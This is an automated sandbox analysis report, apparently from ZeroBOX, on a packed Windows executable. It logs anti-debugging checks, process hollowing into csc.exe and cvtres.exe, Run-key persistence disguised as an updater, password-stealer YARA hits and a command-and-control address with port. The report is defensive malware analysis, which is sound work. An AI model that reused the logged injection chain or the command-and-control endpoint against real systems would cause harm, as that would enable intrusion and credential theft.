Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 6, 2024, 6:15 p.m.	Oct. 6, 2024, 6:29 p.m.

Size	3.4MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`d8b47bd38c34fc553ec5765b5297db5d`
SHA256	`59fe7e6e026da28b275c1fa65ac6f2bb0712793903fe1b77cbe148c15df0c927`
CRC32	`7F5CBD28`
ssdeep	`49152:gVMxgUgoJUcaqCDxdITcP2MNoSPhaC+1R7JDO95n5c:gV7UgoJUBZgoP2MNBajv8955c`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE32 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file mzp_file_format - MZP(Delphi) file format

an_api.exe "C:\Users\test22\AppData\Local\Temp\an_api.exe"
840
- csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
  2188
  - explorer.exe "C:\Windows\explorer.exe"
    2244
    - ctfmon.exe ctfmon.exe
      2688
  - cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" P61I1O 193.142.146.64 8000 O4U27X
    2304

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
193.142.146.64	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (4 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 6, 2024, 6:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2024, 6:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2024, 6:15 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2024, 6:15 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 6, 2024, 6:15 p.m.			0	0
IsDebuggerPresent Oct. 6, 2024, 6:15 p.m.			0	0
IsDebuggerPresent Oct. 6, 2024, 6:15 p.m.			0	0
IsDebuggerPresent Oct. 6, 2024, 6:15 p.m.			0	0
IsDebuggerPresent Oct. 6, 2024, 6:15 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 6, 2024, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a0350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2024, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a0290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2024, 6:15 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002a0290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 6, 2024, 6:15 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

The file contains an unknown PE resource name possibly indicative of a packer (2 events)

resource name	MAD
resource name	PNG

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 6, 2024, 6:16 p.m.	stacktrace: 0x3b90c04 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 69 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x3b90c04 registers.r14: 0 registers.r15: 8791654130368 registers.rcx: 48 registers.rsi: 2097158 registers.r10: 0 registers.rbx: 0 registers.rsp: 78707176 registers.r11: 78707728 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 8796092600912 registers.r12: 4294967295 registers.rbp: 78707296 registers.rdi: 0 registers.rax: 62458880 registers.r13: 8791654130368	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 62 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 98304 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00420000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 61440 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00733000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 28672 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0073b000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 region_size: 100003840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 40960 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00747000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 45056 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0074a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 20480 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 225280 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00754000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 180224 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0075e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00724000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fe0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 192512 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0078a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 167936 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00724000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0066b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0064c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0063a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0063c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d42000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x023f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00701000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Foreign language identified in PE resource (3 events)

name

RT_ICON

language

LANG_CHINESE

filetype

dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x002d7b78

size

0x00010828

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x003247a4

size

0x00000014

name

RT_MANIFEST

language

LANG_CHINESE

filetype

XML 1.0 document, ASCII text, with CRLF line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x003b8cf4

size

0x00000352

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\Music\OcoulsUpdater\EyesUpdater.exe

Creates a shortcut to an executable file (4 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00041000', u'virtual_address': u'0x000af000', u'entropy': 7.410467622829772, u'name': u'.bss', u'virtual_size': u'0x00041000'}

entropy

7.41046762283

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 6, 2024, 6:15 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 6, 2024, 6:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 6, 2024, 6:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 6, 2024, 6:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Oct. 6, 2024, 6:16 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1

Yara rule detected in process memory (9 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: a6214523f668ebf80b4c21bf56f734effaaad650

Communicates with host for which no DNS query was performed (1 event)

host

193.142.146.64

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000b8	1	0	0
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2304 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000260	1	0	0

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater

reg_value

C:\Users\test22\Music\OcoulsUpdater\EyesUpdater.exe

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: base_address: 0xfffde008 process_identifier: 2188 process_handle: 0x000000b8	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¿ëz°à"0ôâ @ `@O Ä@8 H.textøó ô `.rsrcÄ ö@@.reloc@ü@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: P8hÄ 444VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfop000004b0,FileDescription 0FileVersion0.0.0.00InternalNameDLL.exe(LegalCopyright 8OriginalFilenameDLL.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0Ô"êï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00412000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: ä3 base_address: 0x00414000 process_identifier: 2304 process_handle: 0x00000260	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2304 process_handle: 0x00000260	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¿ëz°à"0ôâ @ `@O Ä@8 H.textøó ô `.rsrcÄ ö@@.reloc@ü@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x00000260	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 840 called NtSetContextThread to modify thread in remote process 2188
Process injection	Process 2188 called NtSetContextThread to modify thread in remote process 2304
NtSetContextThread Oct. 6, 2024, 6:15 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 788958 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000b4 process_identifier: 2188	1	0	0
NtSetContextThread Oct. 6, 2024, 6:15 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4264930 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000254 process_identifier: 2304	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2188 resumed a thread in remote process 2304
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x00000254 suspend_count: 1 process_identifier: 2304	1	0	0

Created a process named as a common system process (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Oct. 6, 2024, 6:15 p.m.	thread_identifier: 2248 thread_handle: 0x0000022c process_identifier: 2244 current_directory: filepath: C:\Windows\explorer.exe track: 1 command_line: filepath_r: C:\Windows\explorer.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000230	1	1	0

Executed a process and injected code into it, probably while unpacking (28 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 6, 2024, 6:15 p.m.	thread_identifier: 2192 thread_handle: 0x000000b4 process_identifier: 2188 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe stack_pivoted: 0 creation_flags: 2 (DEBUG_ONLY_THIS_PROCESS) inherit_handles: 0 process_handle: 0x000000b8	1	1
NtGetContextThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000000b4	1	0
NtAllocateVirtualMemory Oct. 6, 2024, 6:15 p.m.	process_identifier: 2188 region_size: 90112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000b8	1	0
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: base_address: 0x000b0000 process_identifier: 2188 process_handle: 0x000000b8	1	1
WriteProcessMemory Oct. 6, 2024, 6:15 p.m.	buffer: base_address: 0xfffde008 process_identifier: 2188 process_handle: 0x000000b8	1	1
NtSetContextThread Oct. 6, 2024, 6:15 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 788958 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000000b4 process_identifier: 2188	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2188	1	0
NtResumeThread Oct. 6, 2024, 6:15 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2188	1	0
